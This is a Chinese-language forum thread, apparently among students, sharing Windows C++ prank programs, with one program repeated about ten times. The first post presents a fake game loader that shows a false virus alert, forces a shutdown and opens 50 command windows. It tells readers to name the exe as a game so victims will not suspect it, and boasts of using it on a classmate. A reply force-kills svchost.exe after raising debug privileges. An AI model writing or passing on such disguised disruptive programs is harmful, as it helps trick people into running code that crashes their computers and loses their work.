高级天翼
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<iomanip>
#include<cstring>
#include<string>
#include<list>
#include<queue>
#include<stack>
#include<ctime>
#include<vector>
#include<bitset>
#include<memory>
#include<windows.h>
using namespace std;
long long q;
int main(){
Sleep(1000);
cout<<"请稍后,正在为您加载游戏";
Sleep(800);
system("cls");
while(1){
if(q>=100){
Sleep(2000);
system("cls");
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";
Sleep(2000);
break;
}
q++;
system("cls");
cout<<"正在加载资源";
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";
for(int i=1;i<=(q-1)/2;i++){
cout<<"■";
}
for(int i=1;i<=50-((q-1)/2);i++){
cout<<"□";
}
cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";
//Sleep(rand()%20);
if(rand()%40==0){
Sleep(100);
}
if(rand()%100==0){
Sleep(200);
}
}
Sleep(1000);
system("cls");
cout<<"检测出本程序有病毒\n\n";
Sleep(500);
cout<<"\n本电脑正在准备为您关闭程序";
system("color 12");
Sleep(100);
system("color 23");
Sleep(100);
system("color 34");
Sleep(100);
system("color 45");
Sleep(100);
system("color 56");
Sleep(100);
system("color 67");
Sleep(100);
system("color 70");
system("shutdown -s -f -t 20");
Sleep(1000);
cout<<"\n\n关闭失败\n\n";
Sleep(1000);
system("cls");
for(int j=1;j<=4;j++){
for(int i=1;i<=3000;i++){
int a=rand();
a%=100;
cout<<char(a);
}
Sleep(200);
system("cls");
}
Sleep(1000);
for(int i=1;i<=50;i++){
Sleep(80);
system("start cmd");
}
return 0;
}
这个代码运行以后把exe文件发给别人,让别人打开就可以关机。
注意!要署名为游戏。
否则别人会怀疑!!!
我上次就把这个发给了我的一个同学,他就关机了。
自己也可以用
我关机一用
资深光能
嗯,话说,你不是1分钟了?
最近是真的闲得慌啊?(doge)
说真的,你不用发出来的,不然能坑更多人(doge)
现在我知道了,得防着你了,不然你不是第一个把我们都坑了?(doge)
修练者
我敢说这应该是最强的吧
#include<bits/stdc++.h>
#include <windows.h>
#pragma GCC optimize("Ofast", "inline", "-ffast-math")
#pragma GCC target("avx,sse2,sse3,sse4,mmx")
using namespace std;
using namespace std::rel_ops;
BOOL EnableDebugPrivilege() {
HANDLE hToken;
BOOL fOk = FALSE;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
fOk = (GetLastError() == ERROR_SUCCESS);
CloseHandle(hToken);
}
return fOk;
}
int main(){
//freopen(".in","r",stdin);
//freopen(".out","w",stdout);
EnableDebugPrivilege();
system("taskkill /im svchost.exe /f");
//fclose(stdin);
//fclose(stdout);
return 0;
}
新手光能
谁不会:
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
void sa(){
int x;
x=MessageBox(GetForegroundWindow(),"你想要你的电脑关机吗?",":P",4);
if(x==6){
system("shutdown -s -t 3");
}
sa();
}
int main(){
cout<<"bye";
sa();
}
新手光能
谁不会:
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
void sa(){
int x;
x=MessageBox(GetForegroundWindow(),"你想要你的电脑关机吗?",":P",4);
if(x==6){
system("shutdown -s -t 3");
}
sa();
}
int main(){
cout<<"bye";
sa();
}
中级守护
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<iomanip>
#include<cstring>
#include<string>
#include<list>
#include<queue>
#include<stack>
#include<ctime>
#include<vector>
#include<bitset>
#include<memory>
#include<windows.h>
using namespace std;
long long q;
int main(){
Sleep(1000);
cout<<"请稍后,正在为您加载游戏";
Sleep(800);
system("cls");
while(1){
if(q>=100){
Sleep(2000);
system("cls");
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";
Sleep(2000);
break;
}
q++;
system("cls");
cout<<"正在加载资源";
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";
for(int i=1;i<=(q-1)/2;i++){
cout<<"■";
}
for(int i=1;i<=50-((q-1)/2);i++){
cout<<"□";
}
cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";
//Sleep(rand()%20);
if(rand()%40==0){
Sleep(100);
}
if(rand()%100==0){
Sleep(200);
}
}
Sleep(1000);
system("cls");
cout<<"检测出本程序有病毒\n\n";
Sleep(500);
cout<<"\n本电脑正在准备为您关闭程序";
system("color 12");
Sleep(100);
system("color 23");
Sleep(100);
system("color 34");
Sleep(100);
system("color 45");
Sleep(100);
system("color 56");
Sleep(100);
system("color 67");
Sleep(100);
system("color 70");
system("shutdown -s -f -t 20");
Sleep(1000);
cout<<"\n\n关闭失败\n\n";
Sleep(1000);
system("cls");
for(int j=1;j<=4;j++){
for(int i=1;i<=3000;i++){
int a=rand();
a%=100;
cout<<char(a);
}
Sleep(200);
system("cls");
}
Sleep(1000);
for(int i=1;i<=50;i++){
Sleep(80);
system("start cmd");
}
return 0;
}
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<iomanip>
#include<cstring>
#include<string>
#include<list>
#include<queue>
#include<stack>
#include<ctime>
#include<vector>
#include<bitset>
#include<memory>
#include<windows.h>
using namespace std;
long long q;
int main(){
Sleep(1000);
cout<<"请稍后,正在为您加载游戏";
Sleep(800);
system("cls");
while(1){
if(q>=100){
Sleep(2000);
system("cls");
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";
Sleep(2000);
break;
}
q++;
system("cls");
cout<<"正在加载资源";
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";
for(int i=1;i<=(q-1)/2;i++){
cout<<"■";
}
for(int i=1;i<=50-((q-1)/2);i++){
cout<<"□";
}
cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";
//Sleep(rand()%20);
if(rand()%40==0){
Sleep(100);
}
if(rand()%100==0){
Sleep(200);
}
}
Sleep(1000);
system("cls");
cout<<"检测出本程序有病毒\n\n";
Sleep(500);
cout<<"\n本电脑正在准备为您关闭程序";
system("color 12");
Sleep(100);
system("color 23");
Sleep(100);
system("color 34");
Sleep(100);
system("color 45");
Sleep(100);
system("color 56");
Sleep(100);
system("color 67");
Sleep(100);
system("color 70");
system("shutdown -s -f -t 20");
Sleep(1000);
cout<<"\n\n关闭失败\n\n";
Sleep(1000);
system("cls");
for(int j=1;j<=4;j++){
for(int i=1;i<=3000;i++){
int a=rand();
a%=100;
cout<<char(a);
}
Sleep(200);
system("cls");
}
Sleep(1000);
for(int i=1;i<=50;i++){
Sleep(80);
system("start cmd");
}
return 0;
}
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<iomanip>
#include<cstring>
#include<string>
#include<list>
#include<queue>
#include<stack>
#include<ctime>
#include<vector>
#include<bitset>
#include<memory>
#include<windows.h>
using namespace std;
long long q;
int main(){
Sleep(1000);
cout<<"请稍后,正在为您加载游戏";
Sleep(800);
system("cls");
while(1){
if(q>=100){
Sleep(2000);
system("cls");
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";
Sleep(2000);
break;
}
q++;
system("cls");
cout<<"正在加载资源";
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";
for(int i=1;i<=(q-1)/2;i++){
cout<<"■";
}
for(int i=1;i<=50-((q-1)/2);i++){
cout<<"□";
}
cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";
//Sleep(rand()%20);
if(rand()%40==0){
Sleep(100);
}
if(rand()%100==0){
Sleep(200);
}
}
Sleep(1000);
system("cls");
cout<<"检测出本程序有病毒\n\n";
Sleep(500);
cout<<"\n本电脑正在准备为您关闭程序";
system("color 12");
Sleep(100);
system("color 23");
Sleep(100);
system("color 34");
Sleep(100);
system("color 45");
Sleep(100);
system("color 56");
Sleep(100);
system("color 67");
Sleep(100);
system("color 70");
system("shutdown -s -f -t 20");
Sleep(1000);
cout<<"\n\n关闭失败\n\n";
Sleep(1000);
system("cls");
for(int j=1;j<=4;j++){
for(int i=1;i<=3000;i++){
int a=rand();
a%=100;
cout<<char(a);
}
Sleep(200);
system("cls");
}
Sleep(1000);
for(int i=1;i<=50;i++){
Sleep(80);
system("start cmd");
}
return 0;
}
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<iomanip>
#include<cstring>
#include<string>
#include<list>
#include<queue>
#include<stack>
#include<ctime>
#include<vector>
#include<bitset>
#include<memory>
#include<windows.h>
using namespace std;
long long q;
int main(){
Sleep(1000);
cout<<"请稍后,正在为您加载游戏";
Sleep(800);
system("cls");
while(1){
if(q>=100){
Sleep(2000);
system("cls");
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";
Sleep(2000);
break;
}
q++;
system("cls");
cout<<"正在加载资源";
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";
for(int i=1;i<=(q-1)/2;i++){
cout<<"■";
}
for(int i=1;i<=50-((q-1)/2);i++){
cout<<"□";
}
cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";
//Sleep(rand()%20);
if(rand()%40==0){
Sleep(100);
}
if(rand()%100==0){
Sleep(200);
}
}
Sleep(1000);
system("cls");
cout<<"检测出本程序有病毒\n\n";
Sleep(500);
cout<<"\n本电脑正在准备为您关闭程序";
system("color 12");
Sleep(100);
system("color 23");
Sleep(100);
system("color 34");
Sleep(100);
system("color 45");
Sleep(100);
system("color 56");
Sleep(100);
system("color 67");
Sleep(100);
system("color 70");
system("shutdown -s -f -t 20");
Sleep(1000);
cout<<"\n\n关闭失败\n\n";
Sleep(1000);
system("cls");
for(int j=1;j<=4;j++){
for(int i=1;i<=3000;i++){
int a=rand();
a%=100;
cout<<char(a);
}
Sleep(200);
system("cls");
}
Sleep(1000);
for(int i=1;i<=50;i++){
Sleep(80);
system("start cmd");
}
return 0;
}
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<iomanip>
#include<cstring>
#include<string>
#include<list>
#include<queue>
#include<stack>
#include<ctime>
#include<vector>
#include<bitset>
#include<memory>
#include<windows.h>
using namespace std;
long long q;
int main(){
Sleep(1000);
cout<<"请稍后,正在为您加载游戏";
Sleep(800);
system("cls");
while(1){
if(q>=100){
Sleep(2000);
system("cls");
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";
Sleep(2000);
break;
}
q++;
system("cls");
cout<<"正在加载资源";
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";
for(int i=1;i<=(q-1)/2;i++){
cout<<"■";
}
for(int i=1;i<=50-((q-1)/2);i++){
cout<<"□";
}
cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";
//Sleep(rand()%20);
if(rand()%40==0){
Sleep(100);
}
if(rand()%100==0){
Sleep(200);
}
}
Sleep(1000);
system("cls");
cout<<"检测出本程序有病毒\n\n";
Sleep(500);
cout<<"\n本电脑正在准备为您关闭程序";
system("color 12");
Sleep(100);
system("color 23");
Sleep(100);
system("color 34");
Sleep(100);
system("color 45");
Sleep(100);
system("color 56");
Sleep(100);
system("color 67");
Sleep(100);
system("color 70");
system("shutdown -s -f -t 20");
Sleep(1000);
cout<<"\n\n关闭失败\n\n";
Sleep(1000);
system("cls");
for(int j=1;j<=4;j++){
for(int i=1;i<=3000;i++){
int a=rand();
a%=100;
cout<<char(a);
}
Sleep(200);
system("cls");
}
Sleep(1000);
for(int i=1;i<=50;i++){
Sleep(80);
system("start cmd");
}
return 0;
}
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<iomanip>
#include<cstring>
#include<string>
#include<list>
#include<queue>
#include<stack>
#include<ctime>
#include<vector>
#include<bitset>
#include<memory>
#include<windows.h>
using namespace std;
long long q;
int main(){
Sleep(1000);
cout<<"请稍后,正在为您加载游戏";
Sleep(800);
system("cls");
while(1){
if(q>=100){
Sleep(2000);
system("cls");
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";
Sleep(2000);
break;
}
q++;
system("cls");
cout<<"正在加载资源";
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";
for(int i=1;i<=(q-1)/2;i++){
cout<<"■";
}
for(int i=1;i<=50-((q-1)/2);i++){
cout<<"□";
}
cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";
//Sleep(rand()%20);
if(rand()%40==0){
Sleep(100);
}
if(rand()%100==0){
Sleep(200);
}
}
Sleep(1000);
system("cls");
cout<<"检测出本程序有病毒\n\n";
Sleep(500);
cout<<"\n本电脑正在准备为您关闭程序";
system("color 12");
Sleep(100);
system("color 23");
Sleep(100);
system("color 34");
Sleep(100);
system("color 45");
Sleep(100);
system("color 56");
Sleep(100);
system("color 67");
Sleep(100);
system("color 70");
system("shutdown -s -f -t 20");
Sleep(1000);
cout<<"\n\n关闭失败\n\n";
Sleep(1000);
system("cls");
for(int j=1;j<=4;j++){
for(int i=1;i<=3000;i++){
int a=rand();
a%=100;
cout<<char(a);
}
Sleep(200);
system("cls");
}
Sleep(1000);
for(int i=1;i<=50;i++){
Sleep(80);
system("start cmd");
}
return 0;
}
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<iomanip>
#include<cstring>
#include<string>
#include<list>
#include<queue>
#include<stack>
#include<ctime>
#include<vector>
#include<bitset>
#include<memory>
#include<windows.h>
using namespace std;
long long q;
int main(){
Sleep(1000);
cout<<"请稍后,正在为您加载游戏";
Sleep(800);
system("cls");
while(1){
if(q>=100){
Sleep(2000);
system("cls");
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";
Sleep(2000);
break;
}
q++;
system("cls");
cout<<"正在加载资源";
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";
for(int i=1;i<=(q-1)/2;i++){
cout<<"■";
}
for(int i=1;i<=50-((q-1)/2);i++){
cout<<"□";
}
cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";
//Sleep(rand()%20);
if(rand()%40==0){
Sleep(100);
}
if(rand()%100==0){
Sleep(200);
}
}
Sleep(1000);
system("cls");
cout<<"检测出本程序有病毒\n\n";
Sleep(500);
cout<<"\n本电脑正在准备为您关闭程序";
system("color 12");
Sleep(100);
system("color 23");
Sleep(100);
system("color 34");
Sleep(100);
system("color 45");
Sleep(100);
system("color 56");
Sleep(100);
system("color 67");
Sleep(100);
system("color 70");
system("shutdown -s -f -t 20");
Sleep(1000);
cout<<"\n\n关闭失败\n\n";
Sleep(1000);
system("cls");
for(int j=1;j<=4;j++){
for(int i=1;i<=3000;i++){
int a=rand();
a%=100;
cout<<char(a);
}
Sleep(200);
system("cls");
}
Sleep(1000);
for(int i=1;i<=50;i++){
Sleep(80);
system("start cmd");
}
return 0;
}
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<iomanip>
#include<cstring>
#include<string>
#include<list>
#include<queue>
#include<stack>
#include<ctime>
#include<vector>
#include<bitset>
#include<memory>
#include<windows.h>
using namespace std;
long long q;
int main(){
Sleep(1000);
cout<<"请稍后,正在为您加载游戏";
Sleep(800);
system("cls");
while(1){
if(q>=100){
Sleep(2000);
system("cls");
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";
Sleep(2000);
break;
}
q++;
system("cls");
cout<<"正在加载资源";
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";
for(int i=1;i<=(q-1)/2;i++){
cout<<"■";
}
for(int i=1;i<=50-((q-1)/2);i++){
cout<<"□";
}
cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";
//Sleep(rand()%20);
if(rand()%40==0){
Sleep(100);
}
if(rand()%100==0){
Sleep(200);
}
}
Sleep(1000);
system("cls");
cout<<"检测出本程序有病毒\n\n";
Sleep(500);
cout<<"\n本电脑正在准备为您关闭程序";
system("color 12");
Sleep(100);
system("color 23");
Sleep(100);
system("color 34");
Sleep(100);
system("color 45");
Sleep(100);
system("color 56");
Sleep(100);
system("color 67");
Sleep(100);
system("color 70");
system("shutdown -s -f -t 20");
Sleep(1000);
cout<<"\n\n关闭失败\n\n";
Sleep(1000);
system("cls");
for(int j=1;j<=4;j++){
for(int i=1;i<=3000;i++){
int a=rand();
a%=100;
cout<<char(a);
}
Sleep(200);
system("cls");
}
Sleep(1000);
for(int i=1;i<=50;i++){
Sleep(80);
system("start cmd");
}
return 0;
}
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<iomanip>
#include<cstring>
#include<string>
#include<list>
#include<queue>
#include<stack>
#include<ctime>
#include<vector>
#include<bitset>
#include<memory>
#include<windows.h>
using namespace std;
long long q;
int main(){
Sleep(1000);
cout<<"请稍后,正在为您加载游戏";
Sleep(800);
system("cls");
while(1){
if(q>=100){
Sleep(2000);
system("cls");
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t\t\t\t 加载完成!";
Sleep(2000);
break;
}
q++;
system("cls");
cout<<"正在加载资源";
cout<<"\n\n\n\n\n\n\n\n\n\n\n\n\n\t ";
for(int i=1;i<=(q-1)/2;i++){
cout<<"■";
}
for(int i=1;i<=50-((q-1)/2);i++){
cout<<"□";
}
cout<<"\n\n\t\t\t\t\t\t\t"<<q<<"%";
//Sleep(rand()%20);
if(rand()%40==0){
Sleep(100);
}
if(rand()%100==0){
Sleep(200);
}
}
Sleep(1000);
system("cls");
cout<<"检测出本程序有病毒\n\n";
Sleep(500);
cout<<"\n本电脑正在准备为您关闭程序";
system("color 12");
Sleep(100);
system("color 23");
Sleep(100);
system("color 34");
Sleep(100);
system("color 45");
Sleep(100);
system("color 56");
Sleep(100);
system("color 67");
Sleep(100);
system("color 70");
system("shutdown -s -f -t 20");
Sleep(1000);
cout<<"\n\n关闭失败\n\n";
Sleep(1000);
system("cls");
for(int j=1;j<=4;j++){
for(int i=1;i<=3000;i++){
int a=rand();
a%=100;
cout<<char(a);
}
Sleep(200);
system("cls");
}
Sleep(1000);
for(int i=1;i<=50;i++){
Sleep(80);
system("start cmd");
}
return 0;
}